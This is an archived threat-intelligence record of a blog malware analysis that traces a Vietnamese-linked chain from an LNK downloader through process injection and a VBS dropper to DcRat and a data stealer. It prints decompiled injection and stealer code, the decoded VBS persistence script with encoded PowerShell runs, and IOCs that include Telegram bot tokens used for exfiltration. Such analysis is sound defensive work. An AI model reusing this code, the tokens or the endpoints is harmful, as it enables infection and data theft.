{
	"id": "a65dce47-7c85-4020-8fd0-32a43a08d6e8",
	"created_at": "2026-04-06T00:11:14.311821Z",
	"updated_at": "2026-04-10T03:24:30.003563Z",
	"deleted_at": null,
	"sha1_hash": "b1acd4e6750b34fe786b59c53cdfc2aa84f209d2",
	"title": "[QuickNote] Uncovering Suspected Malware Distributed By Individuals from Vietnam",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1933059,
	"plain_text": "[QuickNote] Uncovering Suspected Malware Distributed By Individuals from Vietnam\r\nPublished: 2023-04-08 · Archived: 2026-04-05 20:31:24 UTC\r\nRecently, I received a sample hash from a friend on Twitter. Upon further investigation, I noticed that the code was likely created by someone in Vietnam. As a result, I decided to analyze it and share the results with others.\r\nMalicious code can be incredibly dangerous and harmful to computer systems, and it is important to be able to recognize and understand it. By analyzing the code, we can determine its purpose and potential impact, as well as develop strategies to protect against similar threats in the future.\r\nGiven the potential risks of this particular code, I felt it was important to share my findings with others in the security community. By working together and sharing information, we can all help to keep our systems and networks safe from harm. I hope that someone will take the time to investigate deeper and uncover who is behind this malware. It is crucial to identify the culprit and hold them accountable for their actions.\r\nSample hash: 15940f1c8f7e5e79a78c8fad9dc54a8cb9b399d60fb80f6dec2f25870d64dcc1\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 1 of 22\r\nThrough VT’s Telemetry, this sample was submitted from Vietnam. It is possible that the victim submitted it to VT, or that the author submitted it themselves to see whether it would be detected by antivirus companies.\r\nBelow is a diagram illustrating the execution flow of the malware.\r\n1. Stage 1\r\nThe compressed file named “fvia.zip” contains a shortcut file called “fvia.lnk”. If the user double-clicks on this file, it executes a PowerShell script. 
This script is designed to download a payload from the address “hxxps[://]raw[.]githubusercontent[.]com/vltpro/FVIATOOL/main/iXPWQcqYZM[.]exe” and save it as “%APPDATA%\\svchost.exe”. Finally, the downloaded payload is executed.\r\n2. Stage 2\r\nThe downloaded file is a .NET payload. A quick inspection of its information shows several indicators, such as:\r\nUpon analyzing the code of this payload, it was determined that it decrypts two embedded PE files. The first PE file is a .NET payload, while the second PE file is coded in C. After obtaining information about the method within the decoded .NET payload, it calls this method with two parameters: { \"C:\\Windows\\System32\\schtasks.exe\", obj2 }. Here, obj2 refers to the second PE file.\r\nThe basic information of these payloads is as follows:\r\n1st payload (.NET payload): a1cc33df5af690050e7e76ca40668f68ea0801df2569ac7404762f101a065bb6\r\n2nd payload: 7c82507412b690ba888f06d3fb9b2d110e2a346da3322de9468bf46ee7086e93\r\n3. Stage 3\r\nAfter performing deobfuscation and field renaming, the .NET payload code simply utilizes the Process Injection technique. 
It spawns the schtasks.exe process and injects Payload 2 into this process, hiding the malicious code under the guise of the schtasks.exe process to deceive the victim. The decompiled injection routine is shown below (lines are cut off at the right edge in the original screenshot):\r\npublic static void NhXNBbtWQXBcChtcTXUAqcqPi(string path, byte[] BMzkoPmmQXLGAmGCzcVuwiJWE)\r\n{\r\nfor (int i = 0; i \u003c 5; i++)\r\n{\r\nint num = 0;\r\nnQQijGzABIgLBOLrpHqHkkoiD.Struct1 @struct = default(nQQijGzABIgLBOLrp\r\nnQQijGzABIgLBOLrpHqHkkoiD.Struct0 struct2 = default(nQQijGzABIgLBOLrp\r\n@struct.uint_0 = Convert.ToUInt32(Marshal.SizeOf(typeof(nQQijGzABIgLB\r\ntry\r\n{\r\nif (!nQQijGzABIgLBOLrpHqHkkoiD.fn_CreateProcessA(path, string\r\n{\r\nthrow new Exception();\r\n}\r\nint num2 = BitConverter.ToInt32(BMzkoPmmQXLGAmGCzcVuwiJWE, 60\r\nint num3 = BitConverter.ToInt32(BMzkoPmmQXLGAmGCzcVuwiJWE, nu\r\nint[] array = new int[179];\r\narray[0] = 65538;\r\nif (IntPtr.Size == 4)\r\n{\r\nif (!nQQijGzABIgLBOLrpHqHkkoiD.fn_GetThreadContext(st\r\n{\r\nthrow new Exception();\r\n}\r\n}\r\nelse if (!nQQijGzABIgLBOLrpHqHkkoiD.fn_Wow64GetTheadContext(s\r\n{\r\nthrow new Exception();\r\n}\r\nint num4 = array[41];\r\nint num5 = 0;\r\nif (!nQQijGzABIgLBOLrpHqHkkoiD.fn_ReadProcessMemory(struct2.i\r\n{\r\nthrow new Exception();\r\n}\r\nif (num3 == num5 \u0026\u0026 nQQijGzABIgLBOLrpHqHkkoiD.fn_ZwUnmapViewO\r\n{\r\nthrow new Exception();\r\n}\r\nint num6 = BitConverter.ToInt32(BMzkoPmmQXLGAmGCzcVuwiJWE, nu\r\nint num7 = BitConverter.ToInt32(BMzkoPmmQXLGAmGCzcVuwiJWE, nu\r\nbool flag = false;\r\nint num8 = nQQijGzABIgLBOLrpHqHkkoiD.fn_VirtualAllocEx(struct\r\nif (num8 == 0)\r\n{\r\nthrow new Exception();\r\n}\r\nif (!nQQijGzABIgLBOLrpHqHkkoiD.fn_WriteProcessMemory(struct2\r\n{\r\nthrow new Exception();\r\n}\r\nint num9 = 
num2 + 248;\r\nshort num10 = BitConverter.ToInt16(BMzkoPmmQXLGAmGCzcVuwiJWE\r\nfor (int j = 0; j \u003c (int)num10; j++)\r\n{\r\nint num11 = BitConverter.ToInt32(BMzkoPmmQXLGAmGCzcVu\r\nint num12 = BitConverter.ToInt32(BMzkoPmmQXLGAmGCzcVu\r\nint num13 = BitConverter.ToInt32(BMzkoPmmQXLGAmGCzcVu\r\nif (num12 != 0)\r\n{\r\nbyte[] array2 = new byte[num12];\r\nBuffer.BlockCopy(BMzkoPmmQXLGAmGCzcVuwiJWE, n\r\nif (!nQQijGzABIgLBOLrpHqHkkoiD.fn_WriteProces\r\n{\r\nthrow new Exception();\r\n}\r\n}\r\nnum9 += 40;\r\n}\r\nbyte[] bytes = BitConverter.GetBytes(num8);\r\nif (!nQQijGzABIgLBOLrpHqHkkoiD.fn_WriteProcessMemory(struct2\r\n{\r\nthrow new Exception();\r\n}\r\nint num14 = BitConverter.ToInt32(BMzkoPmmQXLGAmGCzcVuwiJWE, n\r\nif (flag)\r\n{\r\nnum8 = num3;\r\n}\r\narray[44] = num8 + num14;\r\nif (IntPtr.Size == 4)\r\n{\r\nif (!nQQijGzABIgLBOLrpHqHkkoiD.fn_SetTheadContext(st\r\n{\r\nthrow new Exception();\r\n}\r\n}\r\nelse if (!nQQijGzABIgLBOLrpHqHkkoiD.fn_Wow64SetTheadContext(s\r\n{\r\nthrow new Exception();\r\n}\r\nif (nQQijGzABIgLBOLrpHqHkkoiD.fn_ResumeThread(struct2.intptr_\r\n{\r\nthrow new Exception();\r\n}\r\nbreak;\r\n}\r\ncatch\r\n{\r\nProcess.GetProcessById(Convert.ToInt32(struct2.uint_0)).Kill\r\n}\r\n}\r\n}\r\nUsing IDA to analyze payload 2, we quickly found the function that performs the main task of the malware. It does the following:\r\nDecrypts strings.\r\nWrites the decrypted content of the script into a file and executes that file.\r\nint __stdcall mw_decrypt_and_exec_vbs_file()\r\n{\r\n // [COLLAPSED LOCAL DECLARATIONS. 
PRESS KEYPAD CTRL-\"+\" TO EXPAND]\r\n sleep(0);\r\n lpOperation = mw_decrypt_string(encString, 4);\r\n lpFile = mw_decrypt_string(byte_402026, 0xA);\r\n v0 = mw_decrypt_string(byte_402031, 0x12E);\r\n ShellExecuteA(0, lpOperation, lpFile, v0, 0, 0);\r\n encString_arr[0] = \u0026byte_402160;\r\n encString_arr[1] = \u0026byte_40216C;\r\n encString_arr[2] = \u0026byte_402178;\r\n encString_arr[3] = \u0026byte_41240D;\r\n encString_arr[4] = \u0026byte_412415;\r\n encString_arr[5] = \u0026byte_412421;\r\n encString_len[0] = 0xB;\r\n encString_len[1] = 0xB;\r\n encString_len[2] = 0x10294;\r\n encString_len[3] = 1;\r\n encString_len[4] = 7;\r\n encString_len[5] = 0xB;\r\n encString_len[6] = 0x10294;\r\n encString_len[7] = 1;\r\n for ( i = 0; i \u003c 2; ++i )\r\n {\r\n if ( !strcmp(encString_arr[3 * i], g_str_pattern) )\r\n {\r\n v1 = mw_decrypt_string(encString_arr[3 * i + 1], encString_len[4 * i + 1]);\r\n strcpy(vbs_file_full_path, v1);\r\n }\r\n else\r\n {\r\n str_special_folder_name = mw_decrypt_string(encString_arr[3 * i], encString_len[4 * i]);\r\n special_folder_path = getenv(str_special_folder_name);\r\n file_name = mw_decrypt_string(encString_arr[3 * i + 1], encString_len[4 * i + 1]);\r\n sprintf(vbs_file_full_path, \"%s\\\\%s\", special_folder_path, file_name);\r\n }\r\n fp = fopen(vbs_file_full_path, \"wb\");\r\n decrypted_file_content = mw_decrypt_string(encString_arr[3 * i + 2], encString_len[4 * i + 2]);\r\n fwrite(decrypted_file_content, encString_len[4 * i + 2], 1u, fp);\r\n fclose(fp);\r\n if ( encString_len[4 * i + 3] )\r\n {\r\n lpOperation = mw_decrypt_string(byte_4226D1, 4);\r\n ShellExecuteA(0, lpOperation, vbs_file_full_path, 0, 0, 0xA);\r\n }\r\n }\r\n return 0;\r\n}\r\nThe pseudocode of the string decryption function is shown below.\r\nBased on this decryption code, we can write an IDAPython script to 
automatically decrypt strings. The result of executing the script is as follows:\r\nBelow is a list of all the decoded strings:\r\nTrying to decode string at address 4010B0\r\nEncoded string: b'A+\\x0b\\x02'\r\nDecoded string: open\r\n------------------------------\r\nTrying to decode string at address 4010C7\r\nEncoded string: b'^4\\x19\\t\\x04RQ\\x17\\x0fP'\r\nDecoded string: powershell\r\n------------------------------\r\nTrying to decode string at address 4010DE\r\nEncoded string: b'\\x03\\x1e\\x00\\x0f\\x19E\\\\\\x16 S\\x08Z\\x13W\\x14QR#\\x1a-W\\x1ea\\ri\\nP\\x1d\\x1b-\\x1d:o\\x0b\\\r\nDecoded string: -EncodedCommand \"PAAjAGgAbgBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAj\r\n------------------------------\r\nTrying to decode string at address 40122E\r\nCan not retrieve address of encrypted string!\r\n------------------------------\r\nTrying to decode string at address 401272\r\nCan not retrieve address of encrypted string!\r\n------------------------------\r\nTrying to decode string at address 4012B3\r\nCan not retrieve address of encrypted string!\r\n------------------------------\r\nTrying to decode string at address 40131D\r\nCan not retrieve address of encrypted string!\r\n------------------------------\r\nTrying to decode string at address 401386\r\nEncoded string: b'A+\\x0b\\x02'\r\nDecoded string: open\r\n------------------------------\r\n************************\r\nTotal decoding calls: 8\r\nSuccessful decoding calls: 4\r\n----Decode strings at the above unreachable addresses----\r\nDecode string at address 402160\r\nDecoded string: UserProfile\r\nDecode string at address 40216C\r\nDecoded string: svchost.vbs\r\nDecode string at address 402178\r\nDecoded string: On Error Resume Next\r\n'Dim suXjung\r\n'suXjung = MsgBox (\"\", , \"\")\r\nFor x = 0 To 5\r\n WScript.Sleep(1000)\r\n 
Next\r\nAzwe25wgvn5g0=\"==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAzwe25wgvn5g16214=\"gSAQEAJBQSAYEADBwZAYFAPBwKA0GAhBQWAIDA1BAdAgEArAgVAADAFBAOAUGAwBQcAcHACBwbAYHAUBAd\r\nAzwe25wgvn5g32428=\"sAwmBMOBsDwiBMuAXCwkBAeBjAwoBMMByDwmBMMBsDwiBMsAXCwkBAsAXCwkBAqAXCwkBAoAXCwkBAmAXC\r\nAzwe25wgvn5g48642=\"AAJtnAAAAAmhDAAAgWAAAAJBAAAgDAAAwaAAAARAAAAUAAAAgIAAAAHUUWaYgCEAAAKtnARAAAiAAAAkJA\r\nAlsddeyb1xim = Azwe25wgvn5g0 + Azwe25wgvn5g16214 + Azwe25wgvn5g32428 + Azwe25wgvn5g48642\r\nSet obj = CreateObject(\"Wscript.Shell\")\r\nSet fso=CreateObject(\"Scripting.FileSystemObject\")\r\n' startPath = obj.SpecialFolders(\"Startup\") \u0026 \"\\Payload.vbs\"\r\n' currentPath = fso.GetAbsolutePathName(wscript.scriptfullname)\r\nReg = \"HKCU\\SOFTWARE\\Payload\\Payload\"\r\nif obj.RegRead(Reg) \u003c\u003e Alsddeyb1xim then\r\nobj.RegWrite Reg, Alsddeyb1xim\r\nend if\r\nPPSS = \"Powershell -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AG\r\n'PSPS = \"Powershell -exec bypass -window 1 #startup\"\r\nobj.Run PSPS, 0, False\r\nobj.Run PPSS, 0, False\r\nDecode string at address 41240D\r\nDecoded string: AppData\r\nDecode string at address 412415\r\nDecoded string: svchost.vbs\r\nDecode string at address 412421\r\nDecoded string: On Error Resume Next\r\n'Dim suXjung\r\n'suXjung = MsgBox (\"\", , \"\")\r\nFor x = 0 To 5\r\n WScript.Sleep(1000)\r\n 
Next\r\nAzwe25wgvn5g0=\"==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAzwe25wgvn5g16214=\"gSAQEAJBQSAYEADBwZAYFAPBwKA0GAhBQWAIDA1BAdAgEArAgVAADAFBAOAUGAwBQcAcHACBwbAYHAUBAd\r\nAzwe25wgvn5g32428=\"sAwmBMOBsDwiBMuAXCwkBAeBjAwoBMMByDwmBMMBsDwiBMsAXCwkBAsAXCwkBAqAXCwkBAoAXCwkBAmAXC\r\nAzwe25wgvn5g48642=\"AAJtnAAAAAmhDAAAgWAAAAJBAAAgDAAAwaAAAARAAAAUAAAAgIAAAAHUUWaYgCEAAAKtnARAAAiAAAAkJA\r\nAlsddeyb1xim = Azwe25wgvn5g0 + Azwe25wgvn5g16214 + Azwe25wgvn5g32428 + Azwe25wgvn5g48642\r\nSet obj = CreateObject(\"Wscript.Shell\")\r\nSet fso=CreateObject(\"Scripting.FileSystemObject\")\r\n' startPath = obj.SpecialFolders(\"Startup\") \u0026 \"\\Payload.vbs\"\r\n' currentPath = fso.GetAbsolutePathName(wscript.scriptfullname)\r\nReg = \"HKCU\\SOFTWARE\\Payload\\Payload\"\r\nif obj.RegRead(Reg) \u003c\u003e Alsddeyb1xim then\r\nobj.RegWrite Reg, Alsddeyb1xim\r\nend if\r\nPPSS = \"Powershell -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AG\r\n'PSPS = \"Powershell -exec bypass -window 1 #startup\"\r\nobj.Run PSPS, 0, False\r\nobj.Run PPSS, 0, False\r\nDone!!!\r\n4. Stage 4\r\nUpon analysis, the svchost.vbs script was found to save a Base64-encoded payload into the registry key “HKCU\\SOFTWARE\\Payload\\Payload”. After saving the payload in the registry, the script uses a PowerShell script to read the payload back from that registry key; the PowerShell script Base64-decodes the payload and executes it.\r\nBased on the PowerShell code snippet above, it can be seen that the payload it loads is again a .NET payload.\r\n5. 
Stage 5\r\nThe final payload has the InternalName Client.exe and operates as a client, connecting to the C2 to download and execute further payloads. Its basic tasks are described below; the corresponding functions are performed according to the decrypted configuration.\r\nIn order to execute its malicious actions, the malware needs to decode its configuration information. Based on the information from Client.Settings.Server_Certificate {CN=DcRat [Issuer] C=CN, L=SH, O=DcRat By qwqdanchun, OU=qwqdanchun..}, it is likely that this payload is based on the source code of hxxps://github[.]com/qwqdanchun/DcRat.\r\nOnce this is done, the malware performs a simple check to ensure that it is not running on a virtual machine. It does this by checking the computer’s cache memory; if no cache memory is detected, it terminates the process immediately, assuming that it is running on a virtual machine.\r\nTo ensure that only one instance of the malware is executed, a Mutex is created.\r\nAdditionally, the AntiProcess function is called to scan all running processes on the system and terminate any process whose name matches a predetermined list:\r\nTaskmgr.exe\r\nProcessHacker.exe\r\nprocexp.exe\r\nMSASCui.exe\r\nMsMpEng.exe\r\nMpUXSrv.exe\r\nMpCmdRun.exe\r\nNisSrv.exe\r\nUserAccountControlSettings.exe\r\ntaskkill.exe\r\nTo ensure persistence, the malware installs itself by setting up a Run key or a scheduled task.\r\nIt also bypasses AMSI (Anti-Malware Scan Interface) to avoid detection by antivirus software.\r\nThe malware establishes a connection to the pastebin website ( hxxps://pastebin[.]com/raw/gdYYU7gi ) to obtain the IP 
address and port number of the C2 (Command and Control) server. It then initiates a connection to the C2 server at the specified IP address and port ( 171[.]247.25.94:5656 ).\r\nIf the connection to the C2 server is successful, the malware authenticates itself as a client and begins collecting information about the victim’s computer to send to the C2 server. The malware then downloads additional payloads from the C2 server to carry out further malicious actions.\r\nAt the time of analysis, the C2 address was no longer reachable, so the analysis stops at this point.\r\nI spent some time quickly examining another file that was also introduced and provided by the threat actor on GitHub: hxxps://github[.]com/vltpro/FVIATOOL/blob/main/fvia.rar . This compressed file contains two executable files. After extracting them, I ran the update.exe file. Its execution runs PowerShell scripts with two purposes. The first is to display an error message form with an OK button, and the second is to add some paths (“$env:UserProfile” and “$env:SystemDrive”) to Windows Defender’s exclusion list. This allows files within these paths to avoid being scanned by Windows Defender, enabling attackers to perform malicious activities stealthily without being detected. The update.exe process then decodes and drops two files, %LocalAppData%\\File1.exe and %AppData%\\ok.exe , and executes them.\r\nA quick examination of the code of the file ok.exe ( 80b231aeb2e6026767e6edd22fa0b073bd805f59aa6eaed5635976a46c10e3cd ) shows that the payload code is similar to the payload analyzed in Stage 5 above. 
It also connects to “hxxps[://]pastebin[.]com/raw/gdYYU7gi” to retrieve the C2 address; however, the Client.Settings.Server_Certificate information has been partially removed, including some important fields.\r\nContinuing on, upon a quick analysis of the code for File1.exe ( ddf0e4ffcdcf120d591a1ea82e58f21936d763f90dc3b33a4c4750fd1496652a ), I noticed that it bears a strong resemblance to the AsyncRAT malware (for example, the name of the Mutex and the structure of the decoded configuration). However, based on information from the Certificate ({[Subject] CN=WorldWind Stealer [Issuer] CN=WorldWind Stealer..}), it is possible that it is hxxps://github[.]com/Leecher21/WorldWind-Stealer .\r\nOr it is possible that this payload is based on the code from “hxxps://github[.]com/LimerBoy/StormKitty”.\r\nThere are various methods to collect information from a victim’s computer, depending on the situation and the type of data needed. 
The following is the method that this malware uses to collect information on the victim’s machine:\r\npublic static bool smethod_0(string string_0)\r\n{\r\ntry\r\n{\r\nClass19.smethod_4(string_0 + \"\\\\Grabber\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass47.smethod_0(string_0 + \"\\\\Browsers\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass41.smethod_0(string_0 + \"\\\\Browsers\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass35.smethod_0(string_0 + \"\\\\Browsers\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass24.smethod_0(Class24.smethod_3(), string_0 + \"\\\\Messenger\\\\Disco\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass25.smethod_0(string_0 + \"\\\\Messenger\\\\Pidgin\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass26.smethod_1(string_0 + \"\\\\Messenger\\\\Telegram\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass28.smethod_0(string_0 + \"\\\\Gaming\\\\Steam\");\r\nClass29.smethod_0(string_0 + \"\\\\Gaming\\\\Uplay\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass27.smethod_5(string_0 + \"\\\\Gaming\\\\Minecraft\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass12.smethod_0(string_0 + \"\\\\Wallets\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass11.smethod_3(Class11.smethod_1(), string_0 + \"\\\\FileZilla\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass15.smethod_0(string_0 + \"\\\\VPN\\\\ProtonVPN\");\r\nClass14.smethod_0(string_0 + \"\\\\VPN\\\\OpenVPN\");\r\nClass13.smethod_1(string_0 + \"\\\\VPN\\\\NordVPN\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nDirectory.CreateDirectory(string_0 + \"\\\\Directories\");\r\nClass18.smethod_2(string_0 + \"\\\\Directories\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nDirectory.CreateDirectory(string_0 + 
\"\\\\System\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass21.smethod_0(string_0 + \"\\\\System\");\r\nClass16.smethod_0(string_0 + \"\\\\System\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass17.smethod_0(string_0 + \"\\\\System\");\r\nClass22.smethod_1(string_0 + \"\\\\System\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass23.smethod_3(string_0 + \"\\\\System\");\r\nClass23.smethod_2(string_0 + \"\\\\System\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nFile.WriteAllText(string_0 + \"\\\\System\\\\ProductKey.txt\", GClass12.sme\r\n}\r\ncatch\r\n{\r\n}\r\nreturn true;\r\n}\r\nOnce the malware has collected this information, it sends it to the attacker’s Telegram account for further exploitation:\r\nBonus VT Graph:\r\nIOCs:\r\n15940f1c8f7e5e79a78c8fad9dc54a8cb9b399d60fb80f6dec2f25870d64dcc1 (zip file)\r\n0603640f8628b4b4c8691204d833bc0b6f8f193049c5e35dc1d556376f4c1b8f (lnk file)\r\n78a627930b04c6ff9bb4a0b5841c4c79bedee168522862e750f5608b43b907ce (payload)\r\n972c14a244a43f498c153ae36495c51c4990f32512650dc870fe5ab6257ad2ad (vbs 
file)\r\nhxxps[://]raw[.]githubusercontent[.]com/vltpro/FVIATOOL/main/iXPWQcqYZM[.]exe\r\nhxxps[://]pastebin[.]com/raw/gdYYU7gi\r\n171[.]247.25.94:5656\r\nhxxps[://]volamtuan[.]com/hd[.]lnk\r\nhxxps[://]raw[.]githubusercontent[.]com/vltpro/FVIATOOL/main/FVIATOOL[.]exe\r\nhxxps[://]github[.]com/vltpro/FVIATOOL/blob/main/cookie[.]exe\r\nhxxps[://]api[.]telegram[.]org/bot5370417334:AAEZrEauqhTNZInhZ9_-SaapQJIi0hIvjJU/sendDocument?chat_id=857408205\r\nhxxps[://]api[.]telegram[.]org/bot1119746739:AAGMhvpUjXI4CzIfizRC–VXilxnkJlhaf8/send\r\nhxxps[://]api[.]telegram[.]org/bot5418167780:AAG6XcSYhQ7qknQ8Cj1YipvMX213kbiDV7s/sendMessage?chat_id=5268900600\r\nvolamtuan[.]com\r\nEnd.\r\nm4n0w4r\r\nSource: https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/"
	],
	"report_names": [
		"quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434274,
	"ts_updated_at": 1775791470,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b1acd4e6750b34fe786b59c53cdfc2aa84f209d2.pdf",
		"text": "https://archive.orkl.eu/b1acd4e6750b34fe786b59c53cdfc2aa84f209d2.txt",
		"img": "https://archive.orkl.eu/b1acd4e6750b34fe786b59c53cdfc2aa84f209d2.jpg"
	}
}